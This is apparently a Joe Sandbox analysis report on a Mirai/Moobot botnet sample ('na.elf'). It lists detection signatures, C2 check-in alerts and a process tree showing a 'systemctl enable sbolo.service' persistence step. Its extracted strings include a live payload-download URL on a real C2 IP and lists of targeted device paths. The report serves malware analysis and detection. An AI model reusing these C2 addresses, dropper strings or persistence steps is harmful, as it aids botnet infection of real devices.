Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
na.elf

Overview

General Information

Sample name:na.elf
Analysis ID:1528128
MD5:a90e60adfd6dcbfa16615dde5f96c3d4
SHA1:2f6619597f57c3f51885382742378f48c715411e
SHA256:0d02114b75777f43679564ba57a32e1e1fbe5c4ca4d759bd20f68657b08318fc
Tags:elfuser-abuse_ch
Infos:

Detection

Mirai, Moobot, Okiru
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Detected Mirai
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Mirai
Yara detected Moobot
Yara detected Okiru
Connects to many ports of the same IP (likely port scanning)
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes the "systemctl" command used for controlling the systemd system and service manager
Found strings indicative of a multi-platform dropper
Sample and/or dropped files contains symbols with suspicious names
Sample contains strings indicative of BusyBox which embeds multiple Unix commands in a single executable
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

Joe Sandbox version:41.0.0 Charoite
Analysis ID:1528128
Start date and time:2024-10-07 16:22:05 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 5m 26s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:na.elf
Detection:MAL
Classification:mal92.troj.linELF@0/3@31/0
  • VT rate limit hit for: na.elf
Command:/tmp/na.elf
PID:6269
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
bolu_botnet_done.
Standard Error:
  • system is lnxubuntu20
  • na.elf (PID: 6269, Parent: 6181, MD5: 5ebfcae4fe2471fcc5695c2394773ff1) Arguments: /tmp/na.elf
    • na.elf New Fork (PID: 6271, Parent: 6269)
    • na.elf New Fork (PID: 6273, Parent: 6269)
    • sh (PID: 6273, Parent: 6269, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /bin/sh -c "systemctl enable sbolo.service > /dev/null 2>&1"
      • sh New Fork (PID: 6275, Parent: 6273)
      • systemctl (PID: 6275, Parent: 6273, MD5: 4deddfb6741481f68aeac522cc26ff4b) Arguments: systemctl enable sbolo.service
    • na.elf New Fork (PID: 6289, Parent: 6269)
  • systemd New Fork (PID: 6277, Parent: 6276)
  • snapd-env-generator (PID: 6277, Parent: 6276, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
NameDescriptionAttributionBlogpost URLsLink
MooBotNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.moobot
SourceRuleDescriptionAuthorStrings
na.elfJoeSecurity_OkiruYara detected OkiruJoe Security
    na.elfJoeSecurity_MoobotYara detected MoobotJoe Security
      na.elfJoeSecurity_Mirai_8Yara detected MiraiJoe Security
        SourceRuleDescriptionAuthorStrings
        6269.1.00007f2a3c017000.00007f2a3c02f000.r-x.sdmpJoeSecurity_OkiruYara detected OkiruJoe Security
          6269.1.00007f2a3c017000.00007f2a3c02f000.r-x.sdmpJoeSecurity_MoobotYara detected MoobotJoe Security
            Process Memory Space: na.elf PID: 6269JoeSecurity_OkiruYara detected OkiruJoe Security
              Process Memory Space: na.elf PID: 6269JoeSecurity_MoobotYara detected MoobotJoe Security
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T16:23:06.006561+020020304901Malware Command and Control Activity Detected192.168.2.235656091.200.103.11723561TCP
                2024-10-07T16:23:15.603354+020020304901Malware Command and Control Activity Detected192.168.2.235656291.200.103.11723561TCP
                2024-10-07T16:23:26.246511+020020304901Malware Command and Control Activity Detected192.168.2.235656491.200.103.11723561TCP
                2024-10-07T16:23:28.899113+020020304901Malware Command and Control Activity Detected192.168.2.235656691.200.103.11723561TCP
                2024-10-07T16:23:33.615423+020020304901Malware Command and Control Activity Detected192.168.2.235656891.200.103.11723561TCP
                2024-10-07T16:23:44.353616+020020304901Malware Command and Control Activity Detected192.168.2.235657091.200.103.11723561TCP
                2024-10-07T16:23:52.077181+020020304901Malware Command and Control Activity Detected192.168.2.235657291.200.103.11723561TCP
                2024-10-07T16:24:00.708676+020020304901Malware Command and Control Activity Detected192.168.2.235657491.200.103.11723561TCP
                2024-10-07T16:24:03.353037+020020304901Malware Command and Control Activity Detected192.168.2.235657691.200.103.11723561TCP
                2024-10-07T16:24:08.992696+020020304901Malware Command and Control Activity Detected192.168.2.235657891.200.103.11723561TCP
                2024-10-07T16:24:19.616536+020020304901Malware Command and Control Activity Detected192.168.2.235658091.200.103.11723561TCP
                2024-10-07T16:24:25.754809+020020304901Malware Command and Control Activity Detected192.168.2.235658291.200.103.11723561TCP
                2024-10-07T16:24:28.387054+020020304901Malware Command and Control Activity Detected192.168.2.235658491.200.103.11723561TCP
                2024-10-07T16:24:39.028066+020020304901Malware Command and Control Activity Detected192.168.2.235658691.200.103.11723561TCP
                2024-10-07T16:24:50.688280+020020304901Malware Command and Control Activity Detected192.168.2.235658891.200.103.11723561TCP
                2024-10-07T16:24:58.320979+020020304901Malware Command and Control Activity Detected192.168.2.235659091.200.103.11723561TCP
                2024-10-07T16:25:09.009078+020020304901Malware Command and Control Activity Detected192.168.2.235659291.200.103.11723561TCP
                2024-10-07T16:25:14.679682+020020304901Malware Command and Control Activity Detected192.168.2.235659491.200.103.11723561TCP
                2024-10-07T16:25:17.306127+020020304901Malware Command and Control Activity Detected192.168.2.235659691.200.103.11723561TCP
                2024-10-07T16:25:21.964504+020020304901Malware Command and Control Activity Detected192.168.2.235659891.200.103.11723561TCP
                2024-10-07T16:25:32.586940+020020304901Malware Command and Control Activity Detected192.168.2.235660091.200.103.11723561TCP
                2024-10-07T16:25:38.215037+020020304901Malware Command and Control Activity Detected192.168.2.235660291.200.103.11723561TCP
                2024-10-07T16:25:44.071976+020020304901Malware Command and Control Activity Detected192.168.2.235660491.200.103.11723561TCP
                2024-10-07T16:25:51.092735+020020304901Malware Command and Control Activity Detected192.168.2.235660691.200.103.11723561TCP
                2024-10-07T16:25:53.596712+020020304901Malware Command and Control Activity Detected192.168.2.235660891.200.103.11723561TCP
                2024-10-07T16:25:56.333906+020020304901Malware Command and Control Activity Detected192.168.2.235661091.200.103.11723561TCP
                2024-10-07T16:26:01.070195+020020304901Malware Command and Control Activity Detected192.168.2.235661291.200.103.11723561TCP
                2024-10-07T16:26:04.700190+020020304901Malware Command and Control Activity Detected192.168.2.235661491.200.103.11723561TCP
                2024-10-07T16:26:12.530708+020020304901Malware Command and Control Activity Detected192.168.2.235661691.200.103.11723561TCP
                2024-10-07T16:26:24.677863+020020304901Malware Command and Control Activity Detected192.168.2.235661891.200.103.11723561TCP
                2024-10-07T16:26:33.331143+020020304901Malware Command and Control Activity Detected192.168.2.235662091.200.103.11723561TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: na.elfReversingLabs: Detection: 66%
                Source: na.elfString: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.8

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56566 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56560 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56578 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56580 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56592 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56562 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56572 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56596 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56590 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56606 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56604 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56618 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56586 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56608 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56614 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56582 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56620 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56570 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56588 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56584 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56594 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56568 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56616 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56576 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56612 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56600 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56564 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56574 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56602 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56610 -> 91.200.103.117:23561
                Source: Network trafficSuricata IDS: 2030490 - Severity 1 - ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1) : 192.168.2.23:56598 -> 91.200.103.117:23561
                Source: global trafficTCP traffic: 91.200.103.117 ports 1,2,3,5,6,23561
                Source: global trafficTCP traffic: 192.168.2.23:56560 -> 91.200.103.117:23561
                Source: global trafficTCP traffic: 192.168.2.23:43928 -> 91.189.91.42:443
                Source: global trafficTCP traffic: 192.168.2.23:42516 -> 109.202.202.202:80
                Source: global trafficTCP traffic: 192.168.2.23:42836 -> 91.189.91.43:443
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.43
                Source: unknownTCP traffic detected without corresponding DNS query: 109.202.202.202
                Source: unknownTCP traffic detected without corresponding DNS query: 91.189.91.42
                Source: global trafficDNS traffic detected: DNS query: yi0key.heleh.com.vn
                Source: na.elfString found in binary or memory: http://91.200.103.117/%s
                Source: na.elf, 6269.1.00007f2a3c037000.00007f2a3c040000.rw-.sdmp, sbolo.service.12.drString found in binary or memory: http://91.200.103.117/bolubotnetarm7
                Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                Source: na.elfELF static info symbol of initial sample: __gnu_unwind_execute
                Source: Initial sampleString containing 'busybox' found: busybox
                Source: Initial sampleString containing 'busybox' found: /bin/busybox
                Source: Initial sampleString containing 'busybox' found: HTTP/1.1 200 OKbolubotnetarmbolubotnetarm5bolubotnetarm6bolubotnetarm7bolubotnetmipsbolubotnetmpslbolubotnetx86_64bolubotnetsh4abcdefghijklmnopqrstuvwxyz/proc/%d/exe/tmp/%s%s%c/proc/self/cmdline/proc/%d/proc/self/proc/proc/%d/cmdlinenetstatwgetcurlbusybox/bin/busybox/proc//proc/%s/exe/proc/self/exevar/Challengeapp/hi3511gmDVRiboxusr/dvr_main _8182T_1108mnt/mtd/app/guivar/Kylinl0 c/udevdanko-app/ankosample _8182T_1104var/tmp/soniahicorestm_hi3511_dvr/usr/lib/systemd/systemd/usr/libexec/openssh/sftp-serverusr/shellmnt/sys/bin/boot/media/apache2srv/var/run/sbin/lib/etc/dev/home/Davincitelnetsshwatchdog/var/spoolsshd/usr/compress/bin//compress/bin/compress/usr/bashhttpdtelnetddropbearropbearencodersystem/root/dvr_gui//root/dvr_app//anko-app//opt/.x86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppcx86x86_64armarm5arm6arm7mipsmipselsh4ppcx86.x86_64.arm.arm5.arm6.arm7.mips.mipsel.sh4.ppc.8
                Source: classification engineClassification label: mal92.troj.linELF@0/3@31/0
                Source: /tmp/na.elf (PID: 6273)Shell command executed: /bin/sh -c "systemctl enable sbolo.service > /dev/null 2>&1"Jump to behavior
                Source: /bin/sh (PID: 6275)Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.serviceJump to behavior
                Source: /tmp/na.elf (PID: 6269)Queries kernel information via 'uname': Jump to behavior
                Source: na.elf, 6269.1.00007ffd404ce000.00007ffd404ef000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-arm/tmp/na.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/na.elf
                Source: na.elf, 6269.1.0000559cad73f000.0000559cad892000.rw-.sdmpBinary or memory string: U!/etc/qemu-binfmt/arm
                Source: na.elf, 6269.1.0000559cad73f000.0000559cad892000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/arm
                Source: na.elf, 6269.1.00007ffd404ce000.00007ffd404ef000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: 6269.1.00007f2a3c017000.00007f2a3c02f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6269, type: MEMORYSTR
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: 6269.1.00007f2a3c017000.00007f2a3c02f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6269, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: 6269.1.00007f2a3c017000.00007f2a3c02f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6269, type: MEMORYSTR
                Source: Yara matchFile source: na.elf, type: SAMPLE
                Source: Yara matchFile source: 6269.1.00007f2a3c017000.00007f2a3c02f000.r-x.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: na.elf PID: 6269, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity Information2
                Scripting
                Valid AccountsWindows Management Instrumentation1
                Systemd Service
                1
                Systemd Service
                1
                Masquerading
                OS Credential Dumping11
                Security Software Discovery
                Remote ServicesData from Local System1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Scripting
                Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
                Non-Standard Port
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture2
                Application Layer Protocol
                Traffic DuplicationData Destruction
                No configs have been found
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Number of created Files
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528128 Sample: na.elf Startdate: 07/10/2024 Architecture: LINUX Score: 92 20 yi0key.heleh.com.vn 91.200.103.117, 23561, 56560, 56562 COMBAHTONcombahtonGmbHDE Germany 2->20 22 109.202.202.202, 80 INIT7CH Switzerland 2->22 24 2 other IPs or domains 2->24 26 Suricata IDS alerts for network traffic 2->26 28 Detected Mirai 2->28 30 Multi AV Scanner detection for submitted file 2->30 32 4 other signatures 2->32 8 na.elf 2->8         started        10 systemd snapd-env-generator 2->10         started        signatures3 process4 process5 12 na.elf sh 8->12         started        14 na.elf 8->14         started        16 na.elf 8->16         started        process6 18 sh systemctl 12->18         started       
                SourceDetectionScannerLabelLink
                na.elf67%ReversingLabsLinux.Backdoor.Mirai
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                NameIPActiveMaliciousAntivirus DetectionReputation
                yi0key.heleh.com.vn
                91.200.103.117
                truetrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://91.200.103.117/%sna.elffalse
                    unknown
                    http://91.200.103.117/bolubotnetarm7na.elf, 6269.1.00007f2a3c037000.00007f2a3c040000.rw-.sdmp, sbolo.service.12.drfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      91.200.103.117
                      yi0key.heleh.com.vnGermany
                      30823COMBAHTONcombahtonGmbHDEtrue
                      109.202.202.202
                      unknownSwitzerland
                      13030INIT7CHfalse
                      91.189.91.43
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      91.189.91.42
                      unknownUnited Kingdom
                      41231CANONICAL-ASGBfalse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      91.200.103.117na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                            na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                              • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                              91.189.91.43na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                na.elfGet hashmaliciousUnknownBrowse
                                  na.elfGet hashmaliciousUnknownBrowse
                                    na.elfGet hashmaliciousUnknownBrowse
                                      WgRaU3h4k8.elfGet hashmaliciousGafgytBrowse
                                        RdcuY1pZig.elfGet hashmaliciousGafgytBrowse
                                          QJ1MJ1roKY.elfGet hashmaliciousMiraiBrowse
                                            CoNziwSE6M.elfGet hashmaliciousMiraiBrowse
                                              dQ10NiRRby.elfGet hashmaliciousMiraiBrowse
                                                LsR22LZMVs.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  yi0key.heleh.com.vnna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.200.103.117
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  CANONICAL-ASGBna.elfGet hashmaliciousUnknownBrowse
                                                  • 185.125.190.26
                                                  na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                                                  • 91.189.91.42
                                                  na.elfGet hashmaliciousMirai, Gafgyt, OkiruBrowse
                                                  • 185.125.190.26
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  na.elfGet hashmaliciousUnknownBrowse
                                                  • 91.189.91.42
                                                  WgRaU3h4k8.elfGet hashmaliciousGafgytBrowse
                                                  • 91.189.91.42
